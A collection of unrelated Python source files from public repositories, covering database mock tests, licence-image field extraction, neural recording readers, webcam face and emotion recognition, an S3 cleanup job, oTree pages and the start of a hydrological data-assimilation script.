assertEqual(expected, set(list(result)))\n\n def test_table_create_1(self, conn):\n expected_1 = set([\"one_x\", \"one_y\", \"one_z\"])\n expected_2 = set([\"two_x\", \"two_y\"])\n r.db(\"db_one\").table_create(\"one_z\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n def test_table_create_2(self, conn):\n expected_1 = set([\"one_x\", \"one_y\"])\n expected_2 = set([\"two_x\", \"two_y\", \"two_z\"])\n r.db(\"db_two\").table_create(\"two_z\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n def test_table_drop_1(self, conn):\n expected_1 = set([\"one_x\"])\n expected_2 = set([\"two_x\", \"two_y\"])\n r.db(\"db_one\").table_drop(\"one_y\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n def test_table_drop_2(self, conn):\n expected_1 = set([\"one_x\", \"one_y\"])\n expected_2 = set([\"two_x\"])\n r.db(\"db_two\").table_drop(\"two_y\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n\nclass TestDbMod(MockTest):\n @staticmethod\n def get_data():\n return {\n \"dbs\": {\n \"db_one\": {\"tables\": {\"one_x\": [], \"one_y\": []}},\n \"db_two\": {\"tables\": {\"two_x\": [], \"two_y\": []}},\n }\n }\n\n def test_db_list(self, conn):\n expected = set([\"db_one\", \"db_two\"])\n result = self.db_list(conn)\n assertEqual(expected, result)\n\n def test_db_create(self, conn):\n expected = set([\"db_one\", \"db_two\", \"db_three\"])\n r.db_create(\"db_three\").run(conn)\n result = self.db_list(conn)\n assertEqual(expected, result)\n\n def test_db_drop(self, conn):\n expected = set([\"db_one\"])\n r.db_drop(\"db_two\").run(conn)\n result = self.db_list(conn)\n assertEqual(expected, result)\n\n def db_list(self, conn):\n # rethinkdb is special and always present; we don't care, for these tests\n return set(r.db_list().run(conn)) - {\"rethinkdb\"}\n\n\nclass TestDbDefault(MockTest):\n @staticmethod\n def get_data():\n return {\n \"dbs\": {\n \"db_one\": {\n \"tables\": {\n \"one_x\": [\n {\n \"id\": \"x\",\n }\n ],\n \"one_y\": [{\"id\": \"y\", \"one_x_id\": \"x\", \"content\": \"value\"}],\n }\n },\n \"db_two\": {\"tables\": {\"two_x\": [], \"two_y\": []}},\n },\n \"default\": \"db_one\",\n }\n\n def test_db_default(self, conn):\n expected = {\"id\": \"x\"}\n result = r.table(\"one_x\").get(\"x\").run(conn)\n assertEqual(expected, result)\n\n def test_db_default_nested(self, conn):\n expected = {\"id\": \"x\", \"content\": \"value\"}\n result = (\n r.table(\"one_x\")\n .get(\"x\")\n .merge(\n lambda doc: r.table(\"one_y\")\n .filter({\"one_x_id\": doc[\"id\"]})\n .pluck([\"content\"])[0]\n )\n .run(conn)\n )\n assertEqual(expected, result)\n","repo_name":"Inveracity/rethinkdb-mock","sub_path":"tests/functional/test_table_db_mod.py","file_name":"test_table_db_mod.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"27327141425","text":"from 
mutils.utils import TESTS_IMAGES_DIR, TESTS_OUTPUT_DIR\nfrom .atri import Atri\nfrom fastapi import Request, Response\nfrom atri_utils import *\nfrom pathlib import Path\nfrom cv_transformations.data_field_detection.data_field_detection import run_driving_detection\nimport re\nimport urllib.parse\n\nPath(TESTS_IMAGES_DIR).mkdir(parents=True, exist_ok=True)\nPath(TESTS_OUTPUT_DIR).mkdir(parents=True, exist_ok=True)\n\ndef test_image_exists(filename: str):\n full_path = Path(TESTS_IMAGES_DIR) / filename\n if Path.exists(full_path):\n return True\n return False\n\ndef create_filename(filename: str, count: int):\n stem = Path(filename).stem + str(count)\n suffix = Path(filename).suffix\n return stem + suffix\n\ndef init_state(at: Atri):\n \"\"\"\n This function is called everytime \"Publish\" button is hit in the editor.\n The argument \"at\" is a dictionary that has initial values set from visual editor.\n Changing values in this dictionary will modify the intial state of the app.\n \"\"\"\n at.preview_wrapper.styles.display = \"none\"\n\ndef handle_page_request(at: Atri, req: Request, res: Response, query: str):\n \"\"\"\n This function is called whenever a user loads this route in the browser.\n \"\"\"\n pass\n\ndef handle_event(at: Atri, req: Request, res: Response):\n \"\"\"\n This function is called whenever an event is received. An event occurs when user\n performs some action such as click button.\n \"\"\"\n # check if file upload event has been triggered\n if at.Upload1.onChange:\n # sanity check if user has successfully uploaded a file\n if at.Upload1.io.files != None:\n files = at.Upload1.io.files\n # check if user has uploaded one or more files\n if len(files) > 0:\n uploadFile = files[0]\n binaryFile = uploadFile.file\n filename = uploadFile.filename\n data = binaryFile.read()\n count = 0\n while True:\n final_filename = filename if count == 0 else create_filename(filename, count)\n if not test_image_exists(final_filename):\n break\n count = count + 1\n \n final_full_path = Path(TESTS_IMAGES_DIR) / final_filename\n print(str(final_full_path))\n with open(str(final_full_path), \"wb\") as f:\n f.write(data)\n at.preview_wrapper.styles.display = \"flex\"\n at.preview.custom.src = create_media_response(data, filename)\n at.image_placeholder.styles.display = \"none\"\n at.filename.custom.text = final_filename\n \n if at.runtest.onClick:\n # TODO: run test\n final_filename = at.filename.custom.text\n final_input_path = Path.joinpath(Path.cwd(), Path(TESTS_IMAGES_DIR) / final_filename)\n final_output_path = Path.joinpath(Path.cwd(), Path(TESTS_OUTPUT_DIR) / final_filename)\n if Path.exists(final_input_path):\n # TODO: get data from test result\n fin = run_driving_detection(str(final_input_path))\n # write output fields\n if \"name\" in fin:\n name = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"name\"])\n else:\n name = \"N/A\"\n\n if \"license_number\" in fin:\n lno = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"license_number\"])\n else:\n lno = \"N/A\"\n\n if \"date_of_birth\" in fin:\n dob = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"date_of_birth\"])\n else:\n dob = \"N/A\"\n\n if \"expiry_date\" in fin:\n exp = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"expiry_date\"])\n else:\n exp = \"N/A\"\n\n if \"address\" in fin: \n address = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"address\"])\n else:\n address = \"N/A\"\n query = {\n \"testname\": final_filename,\n \"name\": name,\n \"lno\": lno,\n \"dob\": dob,\n \"exp\": exp,\n \"address\": address\n }\n url = \"/newtestresult?\" + urllib.parse.urlencode(query)\n 
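# hand off to the results page by setting a Location header (assuming the Atri\n            # runtime turns this into an HTTP redirect for the browser)\n            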
res.headers.append(\"location\", url)\n\n\n","repo_name":"Atri-Apps/cv_workbench","sub_path":"controllers/routes/newtest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"}
+{"seq_id":"23687714003","text":"import numpy as np\n\n# alternative: redis for shared in-memory cache\n\n_storage = {}\n\ndef store(data):\n    key = data.get('identifier')\n    ranges = data.get('ranges', [])\n    _storage[key] = {\n        \"ranges\": ranges,\n        \"arrays\": [np.arange(x[0], x[1]+1) for x in ranges if len(x) == 2]\n    }\n    return True\n\ndef get_storage():\n    return _storage\n\n","repo_name":"john5223/ranger","sub_path":"ranger/services/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"42562628928","text":"import h5py as h5\nimport glob\nimport os\nimport numpy as np\nimport pandas as pd\n\nfrom open_ephys_archived.analysis.recording import Recording\n\nclass KwikRecording(Recording):\n    \n    class Spikes:\n        \n        def __init__(self, dataset, channel_count, recording_index):\n            \n            timestamps = []\n            waveforms = []\n            electrodes = []\n            \n            self.metadata = {}\n            self.metadata['names'] = list(dataset.keys())\n            \n            for i, electrode in enumerate(dataset.keys()):\n                \n                if dataset[electrode]['waveforms_filtered'].shape[2] == channel_count:\n                    \n                    mask = dataset[electrode]['recordings'][()] == recording_index\n                    \n                    timestamps.append(dataset[electrode]['time_samples'][()][mask])\n                    waveforms.append(np.swapaxes(dataset[electrode]['waveforms_filtered'][()][mask,:,:],1,2))\n                    electrodes.append(np.array([i] * len(timestamps[-1])))\n\n            self.timestamps = np.concatenate(timestamps)\n            self.waveforms = np.concatenate(waveforms, axis=0)\n            self.electrodes = np.concatenate(electrodes)\n            \n            order = np.argsort(self.timestamps)\n            \n            self.timestamps = self.timestamps[order]\n            self.waveforms = self.waveforms[order,:,:]\n            self.electrodes = self.electrodes[order]\n        \n    class Continuous:\n        \n        def __init__(self, file, recording_index):\n            \n            f = h5.File(file, 'r')\n            \n            dataset = f['recordings'][str(recording_index)]\n            \n            self.samples = dataset['data'][()]\n            \n            start_time = dataset['application_data']['timestamps'][()][0][0]\n\n            self.timestamps = np.arange(start_time, start_time + self.samples.shape[0])\n            \n            self.metadata = {}\n            self.metadata['processor_id'] = int(os.path.basename(file).split('_')[1].split('.raw')[0])\n            self.metadata['subprocessor_id'] = 0 # format doesn't support subprocessors\n            self.metadata['sample_rate'] = dataset['application_data']['channel_sample_rates'][0]\n            \n            f.close()\n        \n    def __init__(self, directory, experiment_index=0, recording_index=0):\n        \n        Recording.__init__(self, directory, experiment_index, recording_index) \n        self._format = 'kwik'\n        \n    def load_continuous(self):\n        \n        kwd_files = glob.glob(os.path.join(self.directory, 'experiment' +\n                    str(self.experiment_index + 1) + '*.kwd'))\n        \n        if len(kwd_files) > 0:\n            \n            self._continuous = [self.Continuous(file, self.recording_index) for file in kwd_files]\n        \n        \n    def load_spikes(self):\n        \n        spikes_file = os.path.join(self.directory, 'experiment' + str(self.experiment_index + 1) + '.kwx')\n        \n        f = h5.File(spikes_file, 'r')\n        \n        electrodes = f['channel_groups']\n        \n        spikes = [self.Spikes(electrodes, channel_count, self.recording_index) for channel_count in (1,2,4)]\n        \n        self._spikes = [S for S in spikes if len(S.timestamps) > 0]\n        \n        
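# all electrode groups have been read; release the file handle\n        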
f.close()\n \n def load_events(self):\n \n events_file = os.path.join(self.directory, 'experiment' + str(self.experiment_index + 1) + '.kwe')\n \n f = h5.File(events_file, 'r')\n \n recordings = f['event_types']['TTL']['events']['recording'][()]\n timestamps = f['event_types']['TTL']['events']['time_samples'][()]\n \n mask = recordings == self.recording_index\n \n dataset = f['event_types']['TTL']['events']['user_data']\n \n self._events = pd.DataFrame(data = {'channel' : dataset['event_channels'][()][mask] + 1,\n 'timestamp' : timestamps[mask],\n 'processor_id' : dataset['nodeID'][()][mask],\n 'subprocessor_id' : [0] * np.sum(mask),\n 'state' : dataset['eventID'][mask].astype('int')})\n \n f.close()\n \n def __str__(self):\n \"\"\"Returns a string with information about the Recording\"\"\"\n \n return \"Open Ephys GUI Recording\\n\" + \\\n \"ID: \" + hex(id(self)) + '\\n' + \\\n \"Format: Kwik\\n\" + \\\n \"Directory: \" + self.directory + \"\\n\" + \\\n \"Experiment Index: \" + str(self.experiment_index) + \"\\n\" + \\\n \"Recording Index: \" + str(self.recording_index)\n \n\n \n \n ########################################################\n \n @staticmethod\n def detect_format(directory):\n kwik_files = glob.glob(os.path.join(directory, '*.kw*'))\n\n if len(kwik_files) > 0:\n return True\n else:\n return False\n \n @staticmethod\n def detect_recordings(directory):\n \n recordings = []\n \n found_recording = False\n \n kwe_files = glob.glob(os.path.join(directory, 'experiment*.kwe'))\n kwe_files.sort()\n \n if len(kwe_files) > 0:\n \n for experiment_index, file in enumerate(kwe_files):\n print(file)\n \n f = h5.File(file, 'r')\n \n for recording_index, r in enumerate(f['recordings'].keys()):\n \n recordings.append(KwikRecording(directory,\n experiment_index,\n recording_index))\n \n f.close()\n \n found_recording = True\n \n if not found_recording:\n \n kwd_files = glob.glob(os.path.join(directory, 'experiment*.kwd'))\n kwd_files.sort()\n \n if len(kwd_files) > 0:\n \n for experiment_index, file in enumerate(kwd_files):\n \n f = h5.File(file, 'r')\n \n for recording_index, r in enumerate(f['recordings'].keys()):\n \n recordings.append(KwikRecording(directory,\n experiment_index,\n recording_index))\n \n f.close()\n \n found_recording = True\n \n if not found_recording:\n \n kwx_files = glob.glob(os.path.join(directory, 'experiment*.kwx'))\n kwx_files.sort()\n \n if len(kwx_files) > 0:\n \n for experiment_index, file in enumerate(kwx_files):\n \n f = h5.File(file, 'r')\n \n for recording_index, r in enumerate(f['recordings'].keys()):\n \n recordings.append(KwikRecording(directory,\n experiment_index,\n recording_index))\n \n f.close()\n \n found_recording = True\n \n \n if not found_recording:\n raise(IOError('Could not find any data files.'))\n \n return recordings","repo_name":"LBHB/nems_db","sub_path":"open_ephys_archived/analysis/formats/KwikRecording.py","file_name":"KwikRecording.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"8969591577","text":"import datetime\nimport os\nimport sys\nimport cv2\nimport face_recognition\nimport numpy as np\nimport logging\nimport settings\nfrom pathlib import Path\nimport requests\nimport socket\n\nfrom keras.models import load_model\nfrom statistics import mode\nfrom utils.datasets import get_labels\nfrom utils.inference import detect_faces\nfrom utils.inference import draw_text\nfrom utils.inference import draw_bounding_box\nfrom 
utils.inference import apply_offsets\nfrom utils.inference import load_detection_model\nfrom utils.preprocessor import preprocess_input\nfrom flask import session\n\n## Enable these imports to find FPS\n#import argparse\n#from imutils.video import FPS\n#from imutils.video import WebcamVideoStream\n##\n\n\n\nlogging.basicConfig(filename=settings.LOG_PATH, level=logging.INFO)\nstop_check = False\n# Read data from stdin\ndef read_in():\n lines = sys.stdin.readline()\n return lines\n\ndef status(status):\n global stop_check\n stop_check = status\n\n# Function to check if the person is authorised based on certain parameters\ndef authorised(name):\n return not \"Unknown\" in name\n\n\ndef face_recognise(post_ip, post_port, videoFeedIp, videoFeedPort, videoFeedUrl):\n#def main():\n # Getting known encodings and Names\n # parameters for loading data and images\n emotion_model_path = settings.MODEL_PATH+'/emotion_model.hdf5'\n emotion_labels = get_labels('fer2013')\n\n face_cascade = cv2.CascadeClassifier(settings.MODEL_PATH+'/haarcascade_frontalface_default.xml')\n emotion_classifier = load_model(emotion_model_path)\n # hyper-parameters for bounding boxes shape\n frame_window = 10\n emotion_offsets = (20, 40)\n # getting input model shapes for inference\n emotion_target_size = emotion_classifier.input_shape[1:3]\n\n # starting lists for calculating modes\n emotion_window = []\n\n########################################################################\n\n\n known_encodings_file_path = settings.DATA_PATH + '/known_encodings_file.csv'\n people_file_path = settings.DATA_PATH + '/people_file.csv'\n\n # # Check the encoded files are present in the File Path, if not create a new File\n if (not os.path.exists(known_encodings_file_path)):\n known_encode = open(known_encodings_file_path, \"w+\")\n known_encode.close()\n if (not os.path.exists(people_file_path)):\n people_file = open(people_file_path, \"w+\")\n people_file.close()\n\n known_encodings_file = Path(known_encodings_file_path)\n if known_encodings_file.is_file():\n known_encodings = np.genfromtxt((known_encodings_file), delimiter=',')\n else:\n known_encodings = []\n\n # For Storing the name corresponding to the encoding\n people_file = Path(people_file_path)\n if people_file.is_file():\n people = np.genfromtxt((people_file), dtype='U', delimiter=',')\n else:\n people = []\n\n # Capture Video indefinitely\n# url = settings.IP_CAMERA\n url = \"http://\" + videoFeedIp + \":\" + videoFeedPort + \"/\" + videoFeedUrl\n video_capture = cv2.VideoCapture(url)\n #WebcamVideoStream(src=url).start()\n #fps = FPS().start()\n\n original_width = video_capture.get(cv2.CAP_PROP_FRAME_WIDTH)\n original_height = video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n face_locations = []\n face_encodings = []\n face_names = []\n process_this_frame = True\n\n while True:\n\n if (stop_check):\n break\n\n # which also affected this process(don't know why) so to convert it to original size\n if video_capture.get(cv2.CAP_PROP_FRAME_WIDTH) != original_width or video_capture.get(\n cv2.CAP_PROP_FRAME_HEIGHT) != original_height:\n video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, original_width)\n video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, original_height)\n\n ret, frame = video_capture.read()\n frame_captured = str(datetime.datetime.now())\n\n\n #fps.update()\n # Don't proceed further until camera is able to capture pics\n if not ret:\n continue\n\n gray_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rgb_image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n faces = 
face_cascade.detectMultiScale(gray_image, scaleFactor=1.1, minNeighbors=5,\n minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n for face_coordinates in faces:\n\n x1, x2, y1, y2 = apply_offsets(face_coordinates, emotion_offsets)\n gray_face = gray_image[y1:y2, x1:x2]\n try:\n gray_face = cv2.resize(gray_face, (emotion_target_size))\n except:\n continue\n\n gray_face = preprocess_input(gray_face, True)\n gray_face = np.expand_dims(gray_face, 0)\n gray_face = np.expand_dims(gray_face, -1)\n emotion_prediction = emotion_classifier.predict(gray_face)\n emotion_probability = np.max(emotion_prediction)\n emotion_label_arg = np.argmax(emotion_prediction)\n emotion_text = emotion_labels[emotion_label_arg]\n emotion_window.append(emotion_text)\n\n if len(emotion_window) > frame_window:\n emotion_window.pop(0)\n try:\n emotion_mode = mode(emotion_window)\n except:\n continue\n\n if emotion_text == 'angry':\n color = emotion_probability * np.asarray((255, 0, 0))\n elif emotion_text == 'sad':\n color = emotion_probability * np.asarray((0, 0, 255))\n elif emotion_text == 'happy':\n color = emotion_probability * np.asarray((255, 255, 0))\n elif emotion_text == 'surprise':\n color = emotion_probability * np.asarray((0, 255, 255))\n else:\n color = emotion_probability * np.asarray((0, 255, 0))\n\n color = color.astype(int)\n color = color.tolist()\n\n draw_bounding_box(face_coordinates, rgb_image, color)\n draw_text(face_coordinates, rgb_image, emotion_mode,\n color, 0, -45, 1, 1)\n\n frame = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2BGR)\n\n\n # smaller frame 1/4th of original size\n small_frame = cv2.resize(frame, (0, 0), fx=.25, fy=.25)\n\n if process_this_frame:\n # Find the face locations\n face_locations = face_recognition.face_locations(small_frame)\n # Find the face encodings 128 Dimensional!!\n face_encodings = face_recognition.face_encodings(small_frame, face_locations)\n\n face_names = []\n other = 0 # Count of un-authorised people\n for face_encoding in face_encodings:\n\n # Find metrics to match the face encodings with known encodings\n match = face_recognition.compare_faces(known_encodings, face_encoding)\n\n\n name = \"Unknown\"\n files = 'empty'\n # Find if this person is in the present people array\n for i in range(len(match)):\n if match[i]:\n name = people[i]\n face_detected = str(datetime.datetime.now())\n logging.info(\"Frame captured : : \" + frame_captured)\n logging.info(\"Face Detected : : \" + face_detected + \" : : \" + name)\n values = {'name': name, 'hostname': socket.gethostname(), 'timestamp': face_detected}\n url = \"http://\" + post_ip + \":\" + post_port + \"/sendNameOfUser\"\n ###############################################\n send_to_ui = requests.post(url, data=values)\n ###############################################\n break\n\n # Change it, run the loop to find no. of Unknown\n if \"Unknown\" in name:\n other += 1\n name += str(other)\n face_names.append(name)\n\n\n\n print('Name' +str( face_names))\n\n\n\n\n process_this_frame = not process_this_frame\n # stop the timer and display FPS information\n #fps.stop()\n # logging.info(\"Elasped time : : \"+str(fps.elapsed()))\n # logging.info(\"Approx. 
FPS : : \"+str(fps.fps())+\"\\n\")\n\n # #Display the border\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale up the coordinates by 4 to get face\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n # Assuming person in authenticated\n color = (0, 255, 0) # GREEN\n if not authorised(name):\n # Unauthenticated person\n color = (0, 0, 255) # RED\n # Display border\n cv2.rectangle(frame, (left, top), (right, bottom), color, 2)\n # Draw a label with name\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), color, cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n # Display the resulting image with borders and names\n cv2.imshow('Video', frame)\n # Hit 'q' on keyboard to quit\n if cv2.waitKey(100) == 27:\n break\n\n # Release handle to the webcam\n video_capture.release()\n #cv2.closeAllWindows()\n cv2.destroyAllWindows()\n pass\n\n#\n# if __name__ == \"__main__\":\n# main()\n\n","repo_name":"KarthikeyanODL/Voss","sub_path":"mec/MEC-analytics/api/analytics/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"25751221140","text":"import json\nimport os, time\nimport boto3\nimport pymysql\n# to edit put it in a directory with all the requirements and then run following to upload to AWS. The regex makes sure it includes hidden folders: zip -r package.zip * .[^.]* \nos.environ['TZ'] = 'UTC'\ntime.tzset()\n\ndef deletor():\n print(\"[INFO] Starting\")\n \n '''\n Establish a connection to the Database\n '''\n \n dbConnection = pymysql.connect(\n host=os.environ.get('MYSQL_HOSTNAME'),\n user=os.environ.get('MYSQL_USER'),\n passwd=os.environ.get('MYSQL_PASSWORD'),\n database=os.environ.get('MYSQL_DATABASE')\n )\n \n dbCursor = dbConnection.cursor(pymysql.cursors.DictCursor)\n print(\"[INFO] DB Connected\")\n \n '''\n Establish a S3 connection\n '''\n s3client = boto3.client('s3',\n endpoint_url=os.environ['AWS_ENDPOINT_URL'],\n aws_access_key_id=os.environ['python__AWS_SERVER_KEY'],\n aws_secret_access_key=os.environ['python__AWS_SERVER_SECRET_KEY']\n )\n\n print(\"[INFO] S3 Connected\")\n \n print(\"[INFO] Remove files from S3 that are due to be deleted\")\n dbCursor.execute(\"SELECT s3files_bucket,s3files_path,s3files_filename,s3files_extension,s3files_id FROM s3files WHERE s3files_meta_deleteOn IS NOT NULL AND s3files_meta_deleteOn <= CURRENT_TIMESTAMP() AND s3files_meta_physicallyStored = 1\") #Select everything that needs deleting\n listOfFiles = dbCursor.fetchall()\n counter = 0\n for file in listOfFiles:\n deleteRequest = s3client.delete_object(Bucket=str(file['s3files_bucket']), Key=str(file['s3files_path'])+\"/\"+str(file['s3files_filename'])+\".\"+str(file['s3files_extension']))\n if (True):\n #Not yet possible to verify if the file has been deleted or not\n print(\"[RESULT] Found file that needs deleting (id \" + str(file['s3files_id']) + \" = \" + str(file['s3files_path'])+\"/\"+str(file['s3files_filename'])+\".\"+str(file['s3files_extension']) + \") & has now been deleted - updating DB\")\n dbCursor.execute(\"UPDATE s3files SET s3files_meta_physicallyStored = 0 WHERE s3files_id = '\" + str(file['s3files_id']) + \"'\")\n dbConnection.commit()\n counter = counter + 1\n else:\n print(\"[ERROR] Could not delete file with id \" + str(file['s3files_id']) + \" and path \" + 
str(file['s3files_path'])+\"/\"+str(file['s3files_filename'])+\".\"+str(file['s3files_extension']))\n    \n    return counter\n\ndeletor()\nprint(\"[INFO] Completed Script - waiting a bit\")\ntime.sleep(int(os.environ.get('SLEEP_TIME',10)))\nprint(\"[INFO] Completed wait - restarting\")\n","repo_name":"adam-rms/adam-rms-s3Deletor","sub_path":"deletor.py","file_name":"deletor.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"17221984265","text":"TOKEN_K = 4\nWORD_K = 0.75\n\n\ndef tokenize(text: str):\n    char_count = len(text)\n    word_count = len(text.split())\n\n    tokens_by_chars = int(char_count / TOKEN_K)\n    tokens_by_words = int(word_count / WORD_K)\n\n    return int((tokens_by_chars + tokens_by_words) / 2)\n","repo_name":"sound-round/chatGPT-telegram-bot","sub_path":"chatgpt_telegram_bot/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"42985270966","text":"from otree.api import Currency as c, currency_range\r\nfrom ._builtin import Page, WaitPage\r\nfrom .models import Constants\r\n\r\nclass RoundBeginWait(WaitPage):\r\n    after_all_players_arrive = 'begin'\r\n\r\n\r\nclass Round(Page):\r\n    form_model = 'player'\r\n    def get_form_fields(self):\r\n        if self.player.id_in_group == self.group.A_id:\r\n            return []\r\n        else:\r\n            return ['is_selfish']\r\n\r\n\r\nclass RoundWait(WaitPage):\r\n    # normal wait -- proceed once everyone has finished\r\n    after_all_players_arrive = 'set_deposit'\r\n\r\nclass AChoice(Page):\r\n    form_model = 'group'\r\n    form_fields = ['A_continue']\r\n    def is_displayed(self):\r\n        return self.player.id_in_group == self.group.A_id\r\n\r\nclass AChoiceWait(WaitPage):\r\n    # all role-B players wait here\r\n    after_all_players_arrive = 'set_A_choice'\r\n\r\nclass BVote(Page):\r\n    form_model = 'player'\r\n    def get_form_fields(self):\r\n        if self.player.id_in_round == self.group.A_continue:\r\n            return []\r\n        else:\r\n            return ['B_vote']\r\n    def is_displayed(self):\r\n        return self.group.A_continue != 0 and self.player.id_in_group != self.group.A_id\r\n\r\nclass BVoteWait(WaitPage):\r\n    # A waits here\r\n    after_all_players_arrive = 'set_B_vote'\r\nclass Show(Page):\r\n    pass\r\n\r\npage_sequence = [\r\n    RoundBeginWait,\r\n    Round,\r\n    RoundWait,\r\n    AChoice,\r\n    AChoiceWait,\r\n    BVote,\r\n    BVoteWait,\r\n    Show,\r\n]\r\n","repo_name":"philzhxu/symbolpgg0","sub_path":"round_base/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"72199987738","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n## -- Script Meta Data --\n## Author : ler015\n## Created : 2023-10-24 08:49:29.817157\n## Comment : DAISI STEP 1\n## Ensemble Smoother data assimilation applied to the GR2M model\n##\n## ------------------------------\n\nimport sys, os, re, json, math\nimport argparse\nfrom itertools import product as prod\nfrom pathlib import Path\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport numpy as np\nimport pandas as pd\n\nfrom hydrodiy.io import csv, iutils\nfrom hydrodiy.io.hyruns import SiteBatch\n\nfrom pygme import factory\nfrom pydaisi import daisi_data, gr2m_update, gr2m_ensmooth,\\\n    daisi_perf\n\nfrom select_sites import select_sites\n\nimport importlib\nimportlib.reload(gr2m_ensmooth)\n\n#----------------------------------------------------------------------\n# 
Config\n#----------------------------------------------------------------------\nparser = argparse.ArgumentParser(\\\n description=\"DAISI STEP 1 - data assimilation\", \\\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument(\"-d\", \"--debug\", help=\"Debug mode (restricted site list)\", \\\n action=\"store_true\", default=False)\nparser.add_argument(\"-t\", \"--taskid\", help=\"Site batch number (task id)\",\\\n type=int, default=-1)\nparser.add_argument(\"-n\", \"--nbatch\", help=\"Number of site batches\", \\\n type=int, default=4)\nparser.add_argument(\"-fo\", \"--folder_output\", help=\"Output folder\", \\\n type=str, default=None)\nargs = parser.parse_args()\n\ndebug = args.debug\ntaskid = args.taskid\nnbatch = args.nbatch\n\nfolder_output = args.folder_output\nif not folder_output is None:\n folder_output = Path(folder_output)\n assert folder_output.exists()\n\n# Model calibrated in this script\n# See pygme.models for a list of potential models\nmodel_name = \"GR2M\"\n\n# Objective functions\nobjfun_names = [\"kge\", \"bc02\"]\n\ncalperiods = [\"per1\", \"per2\"]\n\n# Configure data assimilation\nnens = 500\n\n# .. assimilation variable box-cox transformation\nlamP = 0.\nlamE = 1.0\nlamQ = 0.2\nnu = 1.\n\n# .. Config perturbation\nalphae = 0.1\n\n# .. create ensmooth config dictionary\n# .. (reduction factor applied to stdev)\nstate_names = [\"P\", \"E\", \"S\", \"P3\", \"R\", \"Q\", \"Q_obs\"]\nstdfacts = {n:alphae for n in state_names}\n\n#----------------------------------------------------------------------\n# Folders\n#----------------------------------------------------------------------\nsource_file = Path(__file__).resolve()\nfroot = source_file.parent.parent\n\nfout = froot / \"outputs\" / \"STEP1_data_assimilation\"\nif not folder_output is None:\n fout = folder_output / \"STEP1_data_assimilation\"\nfout.mkdir(exist_ok=True, parents=True)\n\nfcalib = fout.parent / \"STEP0_gr2m_calibration\"\n\n#----------------------------------------------------------------------\n# Logging\n#----------------------------------------------------------------------\nbasename = source_file.stem\nflog = froot / \"logs\" / f\"{basename}_TASK{taskid}.log\"\nif not folder_output is None:\n flog = folder_output / \"logs\" / f\"{basename}_TASK{taskid}.log\"\nflog.parent.mkdir(exist_ok=True)\nLOGGER = iutils.get_logger(basename, flog=flog, contextual=True, console=False)\n\n#----------------------------------------------------------------------\n# Get data\n#----------------------------------------------------------------------\n\n# Select siteids. 
